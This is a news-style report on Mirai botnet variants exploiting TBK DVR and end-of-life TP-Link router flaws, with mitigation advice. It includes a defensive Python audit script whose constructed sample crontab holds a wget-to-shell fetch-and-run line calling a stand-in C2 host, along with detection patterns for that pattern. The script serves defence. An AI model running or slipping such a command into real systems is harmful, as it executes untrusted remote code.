Mirai Botnet Variants Exploit Vulnerabilities in TBK DVRs and End-of-Life TP-Link Routers, Threatening IoT Security

Threat actors are actively exploiting critical security flaws in TBK Digital Video Recorders (DVRs) and older, unsupported TP-Link Wi-Fi routers to propagate sophisticated variants of the notorious Mirai botnet. This ongoing campaign, detailed by researchers at Fortinet’s FortiGuard Labs and Palo Alto Networks’ Unit 42, highlights the persistent dangers posed by insecure Internet of Things (IoT) devices and the evolving tactics of cybercriminals. The primary malware identified in these attacks is a Mirai variant dubbed "Nexcorium," which leverages known vulnerabilities to infiltrate devices, establish persistence, and launch devastating Distributed Denial-of-Service (DDoS) attacks.
Exploitation of TBK DVRs and the Rise of Nexcorium
The current wave of attacks specifically targets TBK DVR devices by exploiting CVE-2024-3721, a medium-severity command injection vulnerability. This flaw, with a Common Vulnerability Scoring System (CVSS) score of 6.3, affects models TBK DVR-4104 and DVR-4216. Researchers have observed threat actors using this vulnerability to gain unauthorized access and deploy the Nexcorium malware.
Vincent Li, a security researcher cited in the findings, emphasized the inherent risks associated with IoT devices: "IoT devices are increasingly prime targets for large-scale attacks due to their widespread use, lack of patching, and often weak security settings. Threat actors continue exploiting known vulnerabilities to gain initial access and deploy malware that can persist, spread, and cause distributed denial-of-service (DDoS) attacks."
The exploitation process typically begins with the injection of a downloader script through CVE-2024-3721. That script then fetches and executes the Nexcorium botnet payload built for the architecture of the compromised Linux system. Upon successful execution, the malware prints the message "nexuscorp has taken control," signaling a successful infiltration by the threat actor.
Fortinet’s analysis reveals that Nexcorium shares a common architectural foundation with other Mirai variants. Key features include an XOR-encoded configuration table initialization, a watchdog module designed to maintain the malware’s presence, and a robust DDoS attack module. This modular design allows the botnet to be highly adaptable and effective in its malicious operations.
A History of Exploitation and Evolving Threats
The exploitation of CVE-2024-3721 is not a novel occurrence. Over the past year, this particular vulnerability has served as an entry point for multiple malicious campaigns. Previously, it was observed being used to deploy other Mirai variants as well as a relatively new botnet known as RondoDox.
In September 2025, cybersecurity firm CloudSEK shed light on a large-scale "loader-as-a-service" botnet infrastructure that was actively distributing RondoDox, Mirai, and Morte payloads. This operation demonstrated a multi-pronged approach to infection, utilizing weak default credentials and exploiting legacy vulnerabilities in routers, IoT devices, and enterprise applications. The continued reliance on these known exploits underscores a critical gap in IoT device security management.
Nexcorium’s Arsenal: Exploits and Brute-Force Capabilities
Beyond its primary exploitation vector, Nexcorium is equipped with additional tools to expand its reach and enhance its capabilities. The malware includes an exploit for CVE-2017-17215, a known vulnerability affecting Huawei HG532 devices. This allows Nexcorium to further compromise other vulnerable devices within the same network, effectively turning compromised systems into launching pads for broader infection.

Furthermore, Nexcorium incorporates a comprehensive list of hard-coded usernames and passwords. This list is systematically used in brute-force attacks, primarily targeting the Telnet protocol on newly discovered victim hosts. By attempting to establish a Telnet connection with these credentials, attackers aim to gain direct shell access to the compromised device.
Upon a successful Telnet login, the malware establishes persistence by manipulating the system’s crontab and creating systemd services, so the bot survives reboots. Nexcorium then connects to an external command-and-control (C2) server to await instructions for launching various types of DDoS attacks, including floods over UDP, TCP, and SMTP. To hinder detection and analysis, once persistence is in place the malware removes the originally downloaded binary.
Fortinet’s assessment highlights Nexcorium’s adherence to modern IoT botnet characteristics: "The Nexcorium malware displays typical traits of modern IoT-focused botnets, combining vulnerability exploitation, support for multiple architectures, and various persistence methods to sustain long-term access to infected systems. Its use of known exploits, such as CVE-2017-17215, along with extensive brute-force capabilities, underscores its adaptability and efficacy in increasing its infection reach."
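A defender-side audit for the persistence traits described above, added here as an example and not part of Fortinet's report or tooling: it flags crontab entries and systemd units that run from scratch directories or pipe a download into a shell, and running processes whose binary was unlinked after launch. The scratch-directory list and the download-pipe pattern are heuristics assumed here, and all sample inputs are constructed.

```python
import re

# Heuristic assumptions, not indicators from the report: IoT botnet droppers
# commonly execute from world-writable scratch directories.
SUSPICIOUS_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
DOWNLOAD_PIPE = re.compile(r"\b(wget|curl)\b[^|]*\|\s*(sh|bash)\b")

def suspicious_cron_entries(crontab_text: str) -> list[str]:
    """Flag user-crontab lines that run from a scratch directory or pipe a
    download straight into a shell (the dropper pattern described above)."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        # "@reboot CMD" has one schedule field; "m h dom mon dow CMD" has five
        cmd = line.split(None, 1)[-1] if line.startswith("@") else line.split(None, 5)[-1]
        if any(d in cmd for d in SUSPICIOUS_DIRS) or DOWNLOAD_PIPE.search(cmd):
            hits.append(line)
    return hits

def suspicious_systemd_units(units: dict[str, str]) -> list[str]:
    """units maps unit file name -> contents; flag units whose ExecStart
    points into a scratch directory."""
    hits = []
    for name, text in units.items():
        for line in text.splitlines():
            if line.strip().startswith("ExecStart=") and any(
                    d in line for d in SUSPICIOUS_DIRS):
                hits.append(name)
                break
    return hits

def deleted_exe_processes(proc_exe_links: dict[int, str]) -> list[int]:
    """proc_exe_links maps pid -> readlink('/proc/<pid>/exe'); a ' (deleted)'
    suffix means the binary was unlinked after launch, as the dropper is."""
    return sorted(p for p, t in proc_exe_links.items() if t.endswith(" (deleted)"))

# Constructed sample inputs, not taken from a real infection.
SAMPLE_CRONTAB = """# constructed sample
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
@reboot /tmp/.nx/bot.arm7 >/dev/null 2>&1
*/5 * * * * wget -q http://c2.example.invalid/d.sh -O- | sh
"""
SAMPLE_UNITS = {"cron.service": "[Service]\nExecStart=/usr/sbin/cron -f\n",
                "nx.service": "[Service]\nExecStart=/dev/shm/.x/bot\nRestart=always\n"}
SAMPLE_PROC = {1: "/sbin/init", 4242: "/tmp/.nx/bot.arm7 (deleted)"}

if __name__ == "__main__":
    print(suspicious_cron_entries(SAMPLE_CRONTAB), suspicious_systemd_units(SAMPLE_UNITS))
    print(deleted_exe_processes(SAMPLE_PROC))
```

On a live Linux host, feed `deleted_exe_processes` a dict built from `os.readlink("/proc/<pid>/exe")` for each numeric entry in /proc, and the other two functions the output of `crontab -l` and the contents of unit files under /etc/systemd/system.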
Exploitation Attempts on End-of-Life TP-Link Routers
Concurrently, Palo Alto Networks’ Unit 42 has reported on active, automated scanning and probing activities targeting end-of-life (EoL) TP-Link wireless routers. These attacks specifically aim to exploit CVE-2023-33538, a command injection vulnerability with a higher CVSS score of 8.8. While the observed exploitation attempts were flawed and did not result in successful compromises, the underlying vulnerability remains a significant concern.
"Although the in-the-wild attacks we observed were flawed and would fail, our analysis confirms the underlying vulnerability is real," stated researchers Asher Davila, Malav Vyas, and Chris Navarrete. "Successful exploitation requires authentication to the router’s web interface." This implies that while automated scans might be unsuccessful, targeted attacks with valid credentials could potentially lead to a successful compromise.
The severity of CVE-2023-33538 was recognized by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), which added it to its Known Exploited Vulnerabilities (KEV) catalog in June 2025. This inclusion mandates federal agencies to patch or mitigate the vulnerability on their systems. The vulnerability affects several TP-Link models, underscoring the broad potential impact.
The malware associated with these attempted exploits on TP-Link routers exhibits characteristics similar to Mirai, with source code references to the string "Condi." This malware variant also possesses the capability to update itself with newer versions and can function as a web server, actively seeking to infect other devices that connect to it.
The Persistent Threat of Unpatched and Unsupported Devices
The repeated exploitation of vulnerabilities in both TBK DVRs and EoL TP-Link routers underscores a critical and ongoing challenge in cybersecurity: the proliferation of insecure IoT devices. Many of these devices, once deployed, are rarely updated, if at all. Manufacturers often cease providing security patches for older models, leaving them permanently vulnerable to known exploits.
The researchers’ advice to users of affected TP-Link devices is stark and practical: "Given that the affected TP-Link devices are no longer actively supported, users are advised to replace them with a newer model and ensure that default credentials are not used." This recommendation reflects the industry-wide understanding that relying on unsupported hardware is a significant security risk.

Unit 42 further elaborated on the systemic issues: "For the foreseeable future, the security landscape will continue to be shaped by the persistent risk of default credentials in IoT devices. These credentials can turn a limited, authenticated vulnerability into a critical entry point for determined attackers." This highlights that even seemingly minor security oversights, such as weak default passwords, can be amplified into catastrophic security breaches when combined with exploitable vulnerabilities.
Broader Implications for IoT Security
The findings from Fortinet and Palo Alto Networks serve as a stark reminder of the evolving threat landscape for IoT devices. As the number of connected devices continues to surge, so too does the attack surface available to cybercriminals. Botnets like Mirai, and its newer variants such as Nexcorium, are highly effective because they can weaponize a vast number of insecure devices, turning them into a distributed arsenal for launching disruptive and damaging cyberattacks.
The implications of these ongoing attacks are far-reaching. DDoS attacks can cripple businesses, disrupt critical infrastructure, and compromise online services. The compromised devices themselves can become part of a larger criminal enterprise, used for further malicious activities such as spam distribution, credential stuffing, or even as stepping stones for more sophisticated network intrusions.
The reliance on known exploits, combined with brute-force techniques, demonstrates a pragmatic and opportunistic approach by threat actors. They are not necessarily seeking novel vulnerabilities but are efficiently exploiting existing weaknesses that remain unaddressed in a significant portion of the global IoT ecosystem.
Recommendations for Mitigation and Future Security
The ongoing exploitation of these vulnerabilities necessitates a multi-faceted approach to mitigation. For end-users and organizations, immediate steps should include:
- Inventory and Audit: Regularly identify all connected IoT devices within a network and audit their security posture.
- Patching and Updates: Ensure all devices are running the latest firmware and security patches. For devices no longer supported by the manufacturer, prioritize replacement.
- Change Default Credentials: Always change default usernames and passwords to strong, unique credentials. Implement multi-factor authentication where possible.
- Network Segmentation: Isolate IoT devices on a separate network segment to limit the potential lateral movement of malware in case of a compromise.
- Firewall Rules: Configure firewalls to block unnecessary inbound and outbound connections to and from IoT devices.
- Security Awareness: Educate users about the risks associated with IoT devices and the importance of secure configuration.
For manufacturers, the challenge lies in designing and maintaining secure products throughout their lifecycle. This includes:
- Secure-by-Design: Incorporating security considerations from the initial stages of product development.
- Long-Term Support: Committing to providing security updates and patches for a reasonable period after a product’s release.
- Vulnerability Disclosure Programs: Establishing clear channels for security researchers to report vulnerabilities.
The persistent threat posed by Mirai variants and other IoT-focused botnets underscores the critical need for a more robust and proactive approach to IoT security. As the digital landscape continues to evolve, so too must our defenses to protect against the ever-present dangers lurking within our connected environments. The exploitation of legacy vulnerabilities serves as a constant reminder that neglecting the security of older devices can have severe and widespread consequences.